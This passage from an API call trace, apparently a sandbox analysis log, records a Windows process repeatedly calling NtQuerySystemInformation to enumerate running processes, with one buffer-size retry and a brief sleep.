ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2f8) returned 0x0 [0152.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.962] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0156.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x250f8) returned 0xc0000004 [0156.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: SystemInformation=0x327d1a8, ResultLength=0x53ff7ec*=0x1c748) returned 0x0 [0156.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x327d1a8, Length=0x278f8, ResultLength=0x53ff7ec | out: 